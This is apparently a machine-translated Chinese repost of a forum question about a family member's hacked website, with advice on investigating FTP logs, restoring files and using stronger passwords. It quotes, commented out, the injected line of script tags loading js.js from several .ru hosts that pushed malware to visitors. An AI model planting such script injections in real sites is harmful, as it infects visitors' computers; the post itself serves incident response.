我的网站被黑了..我该怎么办？ [关闭]

2024-04-28

我爸爸今天打电话给我，说访问他网站的人收到了 168 个病毒，试图下载到他们的计算机上。他根本不懂技术，而是用所见即所得的编辑器构建了整个东西。

我打开他的网站并查看了源代码，在源代码底部的 HTML 结束标记之前有一行 Javascript 包含内容。他们包括这个文件（以及许多其他文件）：http://www.98hs.ru/js.js http://www.98hs.ru/js.js <-- 在访问该 URL 之前，请关闭 JavaScript。

所以我暂时把它注释掉了。事实证明，他的 FTP 密码是一个简单的字典单词，长度为 6 个字母，因此我们认为这就是它被黑客入侵的原因。我们已将他的密码更改为 8 位以上的非单词字符串（他不会选择密码，因为他是一个喜欢打字的人）。

I did a 98hs.ru 上的 WHOIS http://whois.domaintools.com/98hs.ru并发现它是由智利的服务器托管的。实际上也有一个与之相关的电子邮件地址，但我严重怀疑这个人就是罪魁祸首。可能只是其他一些被黑客攻击的网站......

我现在不知道该怎么办，因为我以前从未处理过此类事情。有人有什么建议吗？

他通过 webhost4life.com 使用简单的、不安全的 ftp。我什至没有看到办法do他们网站上的 sftp。我想他的用户名和密码被截获了？

那么，为了使其与社区更相关，您应该采取哪些步骤/应该遵循哪些最佳实践来保护您的网站免遭黑客攻击？

作为记录，这是“神奇地”添加到他的文件中的代码行（并且不在他计算机上的文件中 - 我将其注释掉只是为了绝对确保它不会执行任何操作在此页面上，尽管我确信杰夫会防止这一点）：

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

尝试收集尽可能多的信息。查看主机是否可以为您提供一个日志，显示与您的帐户建立的所有 FTP 连接。您可以使用这些来查看是否是用于进行更改并可能获取 IP 地址的 FTP 连接。

如果您使用的是预打包软件，例如 Wordpress、Drupal 或其他任何您没有编写代码的软件，则上传代码中可能存在允许此类修改的漏洞。如果是定制的，请仔细检查允许用户上传文件或修改现有文件的所有位置。

第二件事是按原样转储站点并检查所有内容是否有其他修改。这可能只是他们所做的一项修改，但如果他们通过 FTP 进入，谁知道上面还有什么。

将您的站点恢复到已知的良好状态，并根据需要升级到最新版本。

您还必须考虑一定程度的回报。这种损害是否值得尝试追踪该人，或者这只是您生活、学习和使用更强密码的事情？

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

security

cracking

我的网站被黑了..我该怎么办？ [关闭] 的相关文章

使用 WinRT 接受无效的 SSL 证书

在某些情况下您希望应用程序接受无效的 SSL 证书测试环境自签名证书等在 NET 世界中人们会使用ServerCertificateValidationCallback类这样做不幸的是该类不存在于 WinRT 上下文中我需要
匿名、身份验证、模拟和委派之间有什么区别，为什么委派需要 Kerberos？

当我们的客户安装我们的软件时他们通常选择拆分安装其中服务在一个机器上运行数据库在另一个机器上这些服务可能与其他服务通信或者数据库可能包含需要与另一个数据库通信的存储过程这将我们带入了 Kerberos 和 SetSPN 的黑暗
为什么浏览器允许onmousedown JS改变href？

我很长时间以来都注意到当您尝试复制链接位置或在 Facebook 上打开链接时它会修改链接并将其传递给l php 例如我可以被发送到 http www facebook com l php u http 3A 2F 2Fwww goo
如果未使用“data-target”属性，Bootstrap 3.3.7 是否安全？

有一个安全漏洞 https snyk io test npm bootstrap 3 3 7 tab issues关于 Bootstrap 3 3 7 它表示该软件包的受影响版本很容易通过数据目标属性受到跨站点脚本 XSS 攻击我想知道
Hapijs 在一个连接上同时使用 Http 和 Https

New to Hapijs http hapijs com 并尝试使用它来创建一个应用程序该应用程序对所有请求使用 HTTPS 并将 HTTP 重定向到安全连接问题是应用程序进入 HTTPS 模式没有问题但如果我将 URL 更改为 H
有什么方法可以安全地在浏览器中显示视频

有什么方法可以安全地在浏览器中显示视频就像他的安全措施之一视频无法下载谢谢我想您的意思是您不希望您的视频被下载或复制如果是这样那么阻止人们下载视频或多或少是不可能的甚至有很多工具可以从 YouTube 等大型提供商那里下载因
寻找在 Ruby on Rails 中构建安全 REST API 的建议

我正开始为我正在从事的项目构建 REST API 这促使我对使用 RoR 构建 API 的最佳方法进行了一些研究我很快发现默认情况下模型是向世界开放的只需在 URL 末尾添加 xml 并传递适当的参数即可通过 URL 进行调用那么
扩展 URLClassLoader 并覆盖 getPermissions 不起作用

当尝试在类似插件的环境中实现沙箱时我遇到了https stackoverflow com a 5580239 2057294 https stackoverflow com a 5580239 2057294这似乎正是我想要的但是我无法
如何检查 AJAX 请求的真实性

我正在设计一个网站让用户尽快解决谜题 JavaScript 用于为每个谜题计时当谜题完成时毫秒数通过 AJAX 发送到服务器如何保证服务器收到的时间不是用户伪造的我不认为基于会话的真实性令牌 Rails 中用于表单的那种就足够了
如何使用 php 命令使注册表单高度安全？

我想让代码对用户来说真正安全下面的代码显示了 php 代码我已将其用于我的网站现在我已经使用了一些验证例如密码和重复密码必须匹配并且用户必须输入所有字段为了使其更安全我想插入安全命令例如 PDO mysqli crypto
使用 authlogic_api 进行 Rails REST API 访问

我正在为 Steam 游戏编写 Rails 后端 API 该游戏只能通过 REST 调用访问因此不需要特定于用户的身份验证我正在努力实施authlogic api 插件 http github com phurni authlogic
数据 URI 和潜在危险的 Request.Path 值

我尝试过使用带有此 CSS 属性的数据 URI background image url data image png base64 iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAGXRFW
将组“Everyone”添加到目录及其所有子目录

我目前使用的是 Vista 32 位如何添加 Windows 安全组 Everyone 并完全控制目录及其所有子目录和所有文件有我可以使用的 powershell 脚本吗 Thanks 我已经扩展了 martona 的代码片段并且能够
我首次设置 AWS EB 时创建的默认安全组是什么？

我对几个组所扮演的角色感到困惑这些组似乎已自动添加到我的 AWS 安全组列表中并以我收集的默认配置进行连接并且想知道它们是如何工作的以及它们的安全性如何改变具体来说有三个神秘之处 launch wizard 1其中有一条入站规
Firebase API 密钥限制不适用于 Android 应用程序包名称和 SHA1 指纹

我们正在使用 Google Firebase 获取我们应用程序的 CrashLytics 数据以及通过google services json文件被提出作为一个安全问题因为应用程序 apk 文件可以被逆向工程来获取该文件然后攻击者可以
在 C# .net 中如何使用 RSA 和许可证提供程序类进行许可？

我想为简单的控制台应用程序提供许可证我使用 RSACrypttoServiceProvider 类来加密和解密我还想使用 LicFileLicenseProvider 类来为我的应用程序授予许可证如何继承LicFileLicenseP
正确使用 EncryptedSharedPreferences

Android 最近发布了 EncryptedSharedPreferences 它自动加密 SharedPreferences 键值数据虽然这很好但我发现我可以简单地连接 API 调用并检索解密的值除了在调用 EncryptedS
python：PyPi公共模块：如何确定是否安全？

我已经完成了我的 python 3 应用程序它正在使用 PyPi 的多个公共模块然而在我将其部署到我公司的企业将处理客户的凭据并访问第 3 方 API 之前我需要尽职调查确保它们既安全又安全我必须执行哪些步骤验证 PyPi 模
限制 SQL Server 连接到特定 IP 地址

我想将 SQL Server 实例的连接限制为特定 IP 地址我想阻止来自除特定列表之外的任何 IP 地址的任何连接这是可以在 SQL Server 实例或数据库中配置的东西吗听起来像是你会使用Windows防火墙 http tech
评估 CRC-32 实现中的差异

我见过相同基本 CRC 32 算法的许多不同实现如下所示 int remain int sbox SIZESBOX int dividend int bit for dividend 0 dividend lt SIZESBOX divi

随机推荐

将 numpy datetime64 转换为长整数并返回

如何将 NumPy datetime64 转换为长整数并返回 import numpy as np import datetime np datetime64 datetime datetime now astype long 给出的值为
JSF：初始请求和回发请求？

请看一下 JSF 中的下面这行代码
C# 单文件FTP下载

我试图在 C 控制台应用程序中使用 FTP 下载文件但即使我知道路径是正确的我总是收到错误消息 550 file not found 有什么方法可以返回当前路径一旦连接到服务器 lade datei von FTP server st
从数据库或Java对象动态加载spring bean属性）

我有一个场景我需要将属性从数据库或java对象加载到bean中考虑这个例子
如何从 Next.js 应用程序访问 Kubernetes 容器环境变量？

在我的 next config js 中我有一个如下所示的部分 module exports serverRuntimeConfig Will only be available on the server side mySecret s
将 Angular 2 变量绑定到 css 伪类内容：attr() 表达式

我想比较渲染 Angular 2 变量绑定的性能 innerText 将绑定变量作为伪类的内容因为上面的方法强制元素重新渲染然而我很难尝试使角度标记与 css 一起工作这样可行 CSS my el after content att
如何将 FOR AUTO XML 结果插入表中？

我已经使用从表中检索了值 select from tableABC for xml auto elements 现在有这个精确的表tableABC在另一台服务器上我需要将这些检索到的值插入其中如何实现这一目标测试表及数据 creat
每个对象？ [复制]

这个问题在这里已经有答案了我在 JavaScript 中有对象 var object someobject Object aaa true bbb true ccc true 我该如何使用每一个呢 object each function
使用 AngularJS ng-bind-html 时从 json 数据获取 img src

所以我有一个有趣的问题但我还没有找到答案假设我从 JSON 文件中获得了一堆数据但不知何故其中一个主要字段如下所示 description img src http o aolcdn com hss storage midas 37
如何使用jquery或javascript对对象数组进行排序[重复]

这个问题在这里已经有答案了我有一个对象数组 var array id name value id name value and so on 如何让数组按属性名称升序排序 array i 1 我尝试这样做 array i 1 sort 但这
在 rdlc 中打印横向/纵向而不预览

我正在尝试以横向或纵向打印本地报告 private void Export LocalReport report Warning warnings m streams new List
Spring、Hibernate 与 google 应用引擎

项目名称 CarpoolDB 我已在另一个应用程序名称 Carpool 中添加了该项目的 jar 运行拼车应用程序时我遇到以下异常项目拼车在这里我遇到异常因为 carpoolService 在作为 Google Web应用程序
有没有办法获取任务中使用的 SubscriptionID：“Azure 资源组部署”

我在用Azure 资源组部署Azure DevOps 中的任务一些覆盖模板参数包括 SubscriptionID virtualNetworkId subscriptions 53614803 d327 4397 bf55 8dedcc2
Parse.com - 如何刷新用户信息

例如当我更改 Parse 后端中的 bool 值时我无法在 iOS 应用程序中检索该值请参阅以下屏幕截图其中用户对象的第一个布尔值是手动更改的第二个布尔值是从应用程序更改的第一个不起作用而第一个从应用程序更改却起作用我通
删除列表视图项目之间的间距

我正在尝试在 Android 中制作一个包含图像的 ListView 我希望图像在列表中彼此相对但我似乎无法消除间距这是我的 listview xml
在一段时间内切换（或闪烁）表中的特定单元格

我已经在 Html 中创建了一个表格我想让一个特定的单元格闪烁打开和关闭您能否让我知道是否可以使用 javascript h4 Two rows and three columns h4 table border 1 width 10
Android：在以下情况下如何在html中引用css文件

hi在我的应用程序中我需要在 webview 中显示一个 html 页面并且该 html 页面应该引用 css 文件的 sdcard 位置使用 link href 标签我在 sdcard gt mibook 中放置了 2 个文件即
当鼠标移动缓慢时，Bootstrap 4中的菜单消失

我在跑这把小提琴 https jsfiddle net Chamster o23865p6 当鼠标指针从开始快速移动到展开的菜单时一切都很好然而当移动速度较慢时菜单会关闭因为感觉就像鼠标左移 const menu li dro
映射同一类中的两个引用，但引用类具有复合键

我有以下数据库表为了清楚起见这些表已缩写 CREATE TABLE dbo prod uom prod id dbo uid NOT NULL Primary key uom type numeric 9 0 NOT NULL Prim
我的网站被黑了..我该怎么办？ [关闭]

Closed 这个问题是无关 help closed questions 目前不接受答案我爸爸今天打电话给我说访问他网站的人收到了 168 个病毒试图下载到他们的计算机上他根本不懂技术而是用所见即所得的编辑器构建了整个东西我打开

我的网站被黑了..我该怎么办？ [关闭]

我的网站被黑了..我该怎么办？ [关闭] 的相关文章

随机推荐

热门标签